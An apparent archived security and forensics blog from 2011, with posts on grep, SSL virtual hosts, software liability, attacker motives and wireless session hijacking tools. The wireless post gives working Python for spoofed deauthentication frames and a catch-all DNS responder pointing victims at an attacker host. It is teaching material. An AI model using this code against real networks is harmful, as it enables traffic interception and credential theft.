Saturday, 10 September 2011

Podcast 1

Welcome to the first in a series of security and forensic podcasts. We will be covering some of the main issues in security that have hit the news and also providing tips from time to time.

These podcasts will appear at least weekly; for the first episode, click here.

Friday, 9 September 2011

ITE513 Lecture 8 - GREP Section

Welcome to the GREP section of Lecture 8 of ITE 513 (Digital Forensics/Forensic Investigation) from Charles Sturt University (CSU).

In this lecture segment, we cover the universal search tool, grep. Available for Linux by default and Windows with a little mucking about, this is the ultimate command line file search tool.
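For a quick taste of the options covered in the lecture segment, the sketch below exercises case-insensitive, regex and recursive searches. The file paths and contents are made up purely for illustration (note that -o and -r are GNU grep extensions, so the "little mucking about" on Windows usually means installing GNU grep):

```shell
# Build a tiny "evidence" directory to search (contents are illustrative)
mkdir -p /tmp/case01
printf 'alice@example.com\nroot login failed\nBob 192.168.1.77\n' > /tmp/case01/syslog.txt

# Case-insensitive search (-i)
grep -i 'ROOT' /tmp/case01/syslog.txt

# Extended regex (-E), printing only the matched text (-o): IPv4-looking strings
grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' /tmp/case01/syslog.txt

# Recursive search (-r) across a directory, with file names and line numbers (-n)
grep -rn 'login' /tmp/case01
```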

For more information see:

For all of the YouTube videos I am starting see:

Thursday, 8 September 2011


See InfoSec Island for an article on CyberTerror.

Can SSL use host headers?

Actually, virtual host headers can be used for SSL as well. In the HTTP request below, the line, "Host:" is what selects the actual site.

  GET / HTTP/1.1
  Host:
  User-Agent: Windows-RSS-Platform/1.0 (MSIE 7.0; Windows NT 5.1)
  Accept: */*
  Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
  Accept-Encoding: gzip,deflate
  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  Keep-Alive: 300
  Connection: keep-alive
  Cookie: secret authentication token 12345

When SSL is used, the certificate states that a single hostname (or a wildcard covering a domain) is valid for the site, which has traditionally tied one certificate to one IP address.

Reverse DNS can map an IP address to only a single hostname (one PTR record) without error, but SSL (and TLS) do not actually mandate reverse PTR records.

The issue, and the reason some hosts do not allow it, is that multiple certificates can be stored on a single server, so if one virtual server is compromised through a poorly configured web app, many sites can be compromised.

So, it is possible to use SSL on a virtual server with one IP, but it is not always recommended (esp. if the server is shared and you could risk losing control of your certificate keys).
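To illustrate the name-based selection described above, here is a minimal sketch of how a server might read the Host: header to choose which virtual site serves a request. The function name and the site mapping are hypothetical, invented for illustration, not taken from any real server:

```python
def select_virtual_host(raw_request: bytes, sites: dict, default: str) -> str:
    """Pick the document root for a request by reading the HTTP/1.1
    Host: header (hypothetical helper, for illustration only)."""
    # Skip the request line; walk the header lines until the blank line
    for line in raw_request.split(b'\r\n')[1:]:
        if not line:
            break                      # end of headers
        name, _, value = line.partition(b':')
        if name.strip().lower() == b'host':
            host = value.strip().decode().split(':')[0]  # drop any :port suffix
            return sites.get(host, default)
    return default

# Invented example mapping and request
sites = {'shop.example.com': '/var/www/shop', 'blog.example.com': '/var/www/blog'}
req = b'GET / HTTP/1.1\r\nHost: blog.example.com\r\nConnection: close\r\n\r\n'
root = select_virtual_host(req, sites, '/var/www/default')
```

With plain HTTP this works because the server sees the Host: header before choosing a site; under SSL the certificate must be presented first, which is where the one-certificate-per-IP constraint comes from.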

Wednesday, 7 September 2011

Creating a software risk contract to build security into the risk equation

In economic terms, we want to assign liability such that the optimal damage mitigation strategy occurs. The victim will mitigate their damages where no damages for breach apply in respect of the optimal strategy and payoffs. The rule that creates the best incentives for both parties is the doctrine of avoidable consequences (marginal costs liability).

Mitigation of damages is concerned with both the post-breach behaviours of the victim and the actions of the parties to minimise the impact of a breach. In software parlance, this would incur costs to the user of the software in order to adequately secure their systems. This again is a trade-off. Before the breach (through software failures and vulnerabilities that can lead to a violation of a system's security) the user has an obligation to install and maintain the system in a secure state.

The user is likely to have the software products of several vendors installed on a single system. As a consequence of this, the interactions of the software selected and installed by the user span the range of multiple sources and no single software vendor can account for all possible combinations and interactions.
As such, any pre-breach behaviour of the vendor and user of software needs to incorporate the capability of the vendors to not only minimise the vulnerabilities in their own products, but also to account for the interactions of other products installed on a system.

There are several options that can be deployed in order to minimise the effects of a breach due to a software problem prior to the discovery of a vulnerability. These include:

  1. The software vendor can implement protective controls (such as firewalls)
  2. The user can install protective controls
  3. The vendor can provide accounting and tracking functions
In order to minimise the effects of a software vulnerability, the following may be done in addition to the previous steps:
  1. The vendor can employ more people to test software for vulnerabilities
  2. The software vendor can add additional controls
Where more time is expended on the provision of software security by the vendor (hiring more testers, more time writing code etc.), the cost of the software needs to reflect this additional effort; that is, the cost to the consumer increases. This cost can be divided more readily in the case of a widely deployed operating system (such as Microsoft Windows), where the incremental costs can be distributed across more users. Smaller vendors (such as small tailored vendors for the hotel accounting market) do not have this luxury, and the additional controls could result in a substantial increase in the cost of the program.

This is not to say that no liability does or should apply to the software vendor. The vendor in particular faces a reputational cost (discussed later) if they fail to maintain a satisfactory level of controls, do not respond to security vulnerabilities quickly enough, or suffer too many problems.

The accumulation of a large number of software vulnerabilities by a vendor has both a reputational cost to the vendor as well as a direct cost to the user (time to install patches and the associated downtime and lost productivity). As a consequence, the accumulation of software vulnerabilities and the associated difficulty of patching or otherwise mitigating these is a cost to the user that can be investigated prior to a purchase (and is hence a cost that is assigned to new vendors even if they experience exceptionally low rates of patching/vulnerabilities). As users are rational in their purchasing actions[1], they will incorporate the costs of patching their systems into the purchase price[2].

The probability of a vulnerability occurring in a software product will never approach zero. Gödel, Turing and Dijkstra[3] demonstrated that it is not possible to prove that a software product is bug free. As a consequence, the testing process by the vendor can be modelled as a hazard model[4]. In this, it is optimal for the vendor to maximise their returns such that the cost of software testing is balanced against their reputation[5].
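As a rough illustration of the hazard model in the footnote, a Poisson process with an assumed discovery rate gives the probability of a given number of vulnerabilities surfacing in a period. The rate below is invented purely for illustration:

```python
from math import exp, factorial

def p_vulns(k: int, rate: float, t: float) -> float:
    """P(exactly k vulnerabilities are discovered in time t) under a
    Poisson process with discovery rate `rate` per unit time."""
    lam = rate * t
    return exp(-lam) * lam ** k / factorial(k)

# Hypothetical figure: 0.5 vulnerabilities discovered per month
p_clean_year = p_vulns(0, 0.5, 12)   # chance of a vulnerability-free year
p_at_least_one = 1 - p_clean_year    # chance at least one surfaces
```

The point of the model is the non-zero tail: however low the assumed rate, the probability of at least one vulnerability over the product's life never reaches zero.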

The cost of finding vulnerabilities can also be expressed as an optimal function through the provision of a market for vulnerabilities. In this way, the software vendor maximises their testing through a market process. This will result in the vendor extending their own testing to the point where they cannot efficiently discover more bugs. Those bugs that are sold on the market are costed, and the vendor has to pay to either purchase these from the vulnerability researcher (who has a specialisation in uncovering bugs) or increase their own testing. The vendor will continue to increase the amount of testing that they conduct until the cost of their testing exceeds the cost of purchasing the vulnerability.
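The stopping rule described above can be sketched numerically. All cost figures below are hypothetical, chosen only to show the break-even logic:

```python
def optimal_testing_level(marginal_costs, market_price):
    """Return how many incremental units of testing the vendor funds:
    testing expands while the marginal cost of finding the next bug
    in-house stays below the market price of buying that bug."""
    units = 0
    for cost in marginal_costs:       # assumed rising marginal costs
        if cost >= market_price:
            break                     # cheaper to buy on the market
        units += 1
    return units

# Invented figures: cost of finding the nth bug in-house, and a market price
costs = [200, 450, 900, 1800, 3600]
level = optimal_testing_level(costs, 1000)   # vendor funds the first 3 units
```

With these numbers the vendor stops after the third unit of testing, since finding the fourth bug in-house (1800) costs more than buying it (1000).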

This market also acts as an efficient transaction process for the assignment of negligence costs. The user still has to maintain the optimal level of controls that are under their influence (installation, patching frequency etc.), whilst the vendor is persuaded to pay the optimal level of costs for testing and mitigation.

The vendor should not be liable for avoidable consequences[6]. Where the user has failed to patch, to install and configure controls, and to otherwise mitigate the possible damages that they can suffer, the vendor has no responsibility. These costs of mitigation are part of the total cost of ownership for the software.

In creating risk-based contracts, we allow the market to determine the optimal price for risks in software. This allows software hazards to be both modelled and expensed, and the consumer can then make an informed decision based on a trade-off between features and security.

[1] For further information on this topic see behavioural economics and rational behaviour.
[2] It may be demonstrated that sub-optimal behaviour does exist where users limit maintenance (patching) in certain conditions.
[4] This can be demonstrated to fit to a Poisson distributed function
[5] It has been demonstrated that reputation has value to a vendor. This has real world accounting applications in the notion of “good will” in business and capital transactions.
[6] The breaching party is never liable for the damage that could have been mitigated under the legal doctrine of avoidable consequences

Tuesday, 6 September 2011

Wireless Session Hijacking

Wireless session hijacking is the act of usurping the connection between the victim’s system and the wireless access point, typically known as a MiTM, ‘man-in-the-middle’ (or ‘monkey-in-the-middle’) attack.

In this post we will look at a few of the most widely used session hijacking tools for wireless. This list is by no means complete, but is based on some of my favourites.

AirJack is a suite of tools that performs wireless session hijacking. It does this by combining the functionality of three tools:
  • WLAN-jack – creates a wireless DoS by sending de-authentication frames to a target system or to a broadcast address, while spoofing the MAC address of the access point with the goal of knocking the wireless client(s) off the network.
  • ESSID-jack – discovers the ESSID by sending de-authentication frames to all clients on the network, then sniffing for association frames when the legitimate clients attempt to re-connect and pulling the ESSID from these frames.
  • Monkey-jack – the ‘man-in-the-middle’ tool that implements the session hijacking.


Monkey-jack is the tool that combines WLAN-jack and ESSID-jack functionality in order to establish the session hijack. It does this in the following manner:
  • Sends wireless de-authentication frames with a spoofed MAC address of the access point to knock legitimate clients off the network.
  • Sniffs the wireless network for association frames that clients will send when re-establishing connectivity with the wireless access point. The ESSID is included in these frames.
  • Using the sniffed ESSID information, Monkey-jack injects a response to the victim and poses as the access point by spoofing the ESSID and MAC address of the legitimate access point on a different channel (at least 5 channels away).
  • The victim associates with the attacker’s system that is running Monkey-jack.
  • The attacker’s system then associates with the legitimate access point, posing as the client using the client’s MAC address.
Once the associations are completed, all traffic from the client and access point flows through the attacker’s system that is running Monkey-jack. The traffic can now be logged or manipulated in any fashion.
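The de-authentication step above relies on a spoofed 802.11 management frame, and the sketch below builds one byte-for-byte. The MAC addresses are invented, and actually transmitting such a frame requires a raw injection-capable interface and is unlawful against networks you do not own; this is purely to show what is on the wire:

```python
import struct

def deauth_frame(client_mac: bytes, ap_mac: bytes, reason: int = 7) -> bytes:
    """Build a raw 802.11 deauthentication management frame
    (type 0 = management, subtype 12 = deauthentication)."""
    frame_control = b'\xc0\x00'            # subtype 12, type 0, version 0, no flags
    duration = b'\x3a\x01'                 # a typical duration value
    seq_ctrl = b'\x00\x00'                 # sequence/fragment number
    reason_code = struct.pack('<H', reason)  # 7 = class 3 frame from nonassociated STA
    # addr1 = destination (client), addr2 = source (spoofed AP), addr3 = BSSID (AP)
    return (frame_control + duration
            + client_mac + ap_mac + ap_mac
            + seq_ctrl + reason_code)

# Invented addresses for illustration
ap = bytes.fromhex('00aabbccddee')
client = bytes.fromhex('112233445566')
frame = deauth_frame(client, ap)   # 24-byte management header + 2-byte reason code
```

Sending this to the broadcast address (ff:ff:ff:ff:ff:ff) as addr1 is what lets WLAN-jack knock every client off the network at once.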

Access Point Impersonation

The majority of wireless clients today use a function named the Preferred Network List (PNL). When a wireless client associates with an access point, it will save the ESSID and MAC address of the wireless access point so that it can automatically connect to it in the future without any user intervention. Most wireless clients will also rotate through the PNL periodically and send probes, typically when booting, resuming from hibernation, or after a signal is lost. Some clients will also cycle through the PNL even when associated with an access point.
Some operating systems (Windows Vista, Windows 7) will not send these probes unless beacons are detected for a given SSID. Windows XP does send these probes, but can be patched so that it prevents information leakage like Windows Vista and Windows 7. If a wireless client does send these probes, it is susceptible to access point impersonation.


Karma is a wireless attack tool that sniffs the wireless network looking for PNL probes so that it can impersonate an access point and attempt to associate with the wireless client. Karma does this in the following manner:
  • Karma running on an attacker’s machine sets the wireless card in monitor mode, watching for probe packets.
  • When a probe is detected, Karma changes the wireless card to master mode and sends a response with the ESSID it discovered in the probe request and spoofs the MAC address of the access point it’s impersonating.
  • The client and Karma authenticate and associate (using no encryption).
  • When the client sends a DHCP request, Karma responds with a configuration that sends all traffic to the attacker system running Karma.
  • When the client runs an application that Karma supports, it will respond to the request, allowing the attacker to deliver exploits, harvest account information, etc.
Karma supports the following services which are built in to the tool:
  • DHCP – services client DHCP requests, sending an IP address, netmask, default gateway (Karma system IP), and DNS server configuration (Karma system IP).
  • DNS – The DNS service resolves all requests for hostnames back to the system running Karma.
  • HTTP – Karma will masquerade as every known web server, and serve up web page(s) of the attacker’s choice, including exploits.
  • FTP – Karma will masquerade as every known FTP server and will harvest account credentials, storing them in a file.
  • POP3 – Acting as a POP3 server, Karma will log all usernames and passwords sent by the client over the Post Office Protocol (POP).
  • SMB – Karma will act as Windows files shares or print shares, collecting the client’s challenge/response transactions for later cracking.
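Karma's catch-all DNS behaviour can be sketched as follows. This is an illustrative fragment, not Karma's actual code: the attacker address is invented, and it assumes a query containing a single question and no additional records:

```python
import struct

ATTACKER_IP = "10.0.0.1"   # hypothetical address of the Karma host

def catch_all_dns_response(query: bytes) -> bytes:
    """Given a raw DNS query (one question, no extra records), build a
    response answering any A-record question with the attacker's IP."""
    txid = query[:2]                           # echo the transaction ID
    flags = b'\x81\x80'                        # standard response, recursion available
    counts = struct.pack('>HHHH', 1, 1, 0, 0)  # 1 question, 1 answer, 0 auth, 0 extra
    question = query[12:]                      # echo the question section verbatim
    answer = (b'\xc0\x0c'                      # compression pointer to the queried name
              + struct.pack('>HHIH', 1, 1, 60, 4)  # type A, class IN, TTL 60s, 4 bytes
              + bytes(int(o) for o in ATTACKER_IP.split('.')))
    return txid + flags + counts + question + answer
```

Because every hostname resolves to the attacker, any application the client then launches (browser, mail, FTP) lands on the matching fake service in the list above.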

Karma Metasploit Integration

A great feature of some Metasploit versions is its built-in integration of Karma. This is commonly referred to as “Karmetasploit” or “Karmasploit”. This built-in version of Karma has all of Karma’s functionality whilst also being able to be served up from within the Metasploit interface. This provides a simple delivery platform for the transfer and deployment of exploits for client browsers and other various client-side applications.

Monday, 5 September 2011


Landes (1998) contends that the Luddite opposition to the “free market and opposition to technological 'progress' were roughly equivalent”. He proposes that the Luddites’ opposition to the advancement into modern society, with its elevated standards of living in urbanised nations, was due to the exercise of technology for personal gain, a situation that mirrors the protests against the WTO in recent times.

Neo-Luddism has become tantamount to opposition to advancing technology due to the cultural changes associated with it. The movement inaugurated in Nottingham in 1811 reflects the cultural opposition to technology still present in many groups and companies today.

“It ought to be remembered that there is nothing more difficult to take in hand, more perilous to conduct, or more uncertain in its success, than to take the lead in the introduction of a new order of things. Because the innovator has for enemies all those who have done well under the old conditions and lukewarm defenders in those who may do well under the new” (Machiavelli, Il principe). As such it is also difficult to accept that our changes are any different from those of preceding generations.

  • Landes, David (1998) “The Wealth and Poverty of Nations: Why Some Are So Rich and Some So Poor”, W. W. Norton & Company
  • Machiavelli, Niccolò (1513) “Il principe” (The Prince)

Cui Bono?

In forensic science, the fundamental question to ask is always Cui Bono?, or ‘Who benefits?’.

There are crimes where people seek infamy as well as for economic gain. In some instances, the person attacking the system may wish to do this to injure another. What is generally true in any case is that somebody benefits.

There are always multiple possible culprits in any investigation, so if you can narrow down the field by starting with those who benefit from the action the most, it is likely that your role will be simplified.
The primary motivations for attackers to break into systems these days are economic. Some of these include:
1. Theft of trade secrets and other Intellectual Property (IP) for economic gain,
2. Attempting to monopolize a product or other offering in a selected market,
3. Acquiring competitive advantage in domestic and global markets,
4. Theft of computer technology,
5. Privacy violations,
6. Damaging one's competitor and hence making them less competitive,
7. Leveraging access to pivot or attack other systems,
8. A false flag operation designed to make another look guilty,
9. Using the system as a form of low-cost hosting (e.g. in pharmacy spam image hosting and in illicit porn), and
10. Bringing attention to an individual, group or activity.

Basically, the threats are the same as they have always been; only the media has evolved to make it easier to commit the crime.

Determining why can often come down to seeing what. Even paper can be stolen and any of the following can be a source of an information leak:

  • Documents – whether completed or still in draft, and working notes or scrap paper
  • Computer Based Information
  • Photographs, Maps and Charts
  • Internal Correspondence and email
  • Legal and Regulatory Filings
  • Company Intranet access and Publications
  • Formal meeting minutes or transcripts
  • Casual conversations
  • Conversations at trade shows and events.
A competing organization may also be able to make use of and gain an advantage using the following:
  • Marketing and product plans (esp. prior to release)
  • Source code
  • Corporate strategies and plans
  • Marketing, advertising and packaging expenditures
  • Pricing issues, strategies, lists
  • R&D, manufacturing processes and technological operations
  • Target markets and prospect information
  • Plant closures and development
  • Product designs, development and costs
  • Staffing, operations, org charts, wage/salary
  • Partner and contract arrangements (including delivery, pricing and terms)
  • Customer and supplier information
  • Merger and acquisition plans
  • Financials, revenues, P&L, R&D budgets
With the rise of identity fraud and other related offenses, the theft of proprietary company information and private personnel records is also increasing. PII (Personally Identifiable Information) has become a prime target for cyber criminals. Using these records, they can create fake loan applications, purchase goods or even make a complete false identity.

The records sought include:
  • Home addresses
  • Home phone number
  • Names of spouse and children
  • Employee’s salary
  • Social security number
  • Medical records
  • Credit records or credit union account information
  • Performance review
Threat Agents
Knowing who benefits goes a long way toward discovering who has attacked a site. A variety of threat agents exist for any organisation, and the nature of the information, the systems and the activities of the organisation will determine who will benefit from attacking the computer systems of that organisation. The threat agents exist in several general categories.

Any of the following may be a source of threat to an organisation:
  • Accidental antagonists who cause you harm through ignorance or by negligence
  • Incidental antagonists who seek another target but attack because you are there and obtainable
  • Insiders. They may compromise or steal information assets because of motivations from dissatisfaction to economic gain
  • Competitors may attack to gain a benefit or to achieve market dominance
  • Cyber-Vandals, who could attack because you are there or you have a product they do not like
  • Hackers and Crackers in an attempt to obtain information concerning everything that is denied to them or who might be offering their technical proficiency to another with motives of their own
  • Thieves that may attack to further their own financial wellbeing
  • Terrorists, can attack in order to disrupt the connection linking the general public and critical infrastructure
  • The military involved in information warfare actions
We can simplify this and summarize the main threats to include:
  • Third World Countries,
  • Organized Crime,
  • Hackers,
  • Hacktivists,
  • Terrorist Organizations,
  • Internal Competitors (within a nation),
  • Foreign Competitors, and
  • Foreign Intelligence Agencies
Hostile nations such as China, North Korea, Cuba and Iran are only one source of remote threat. Friendly nations have also been known (and caught) engaging in these activities in the past.

What this tells us…
It all comes down to “know thy enemy”. In both responding to an incident and in preventing one, it is essential to know who would benefit from attacking your organisation's systems.
As Sun Tzu said:
“Know your enemy and know yourself; in a hundred battles, you will never be defeated. When you are ignorant of the enemy but know yourself, your chances of winning or losing are equal. If ignorant both of your enemy and of yourself, you are sure to be defeated in every battle.”
The first step to understanding an attacker is to understand who benefits.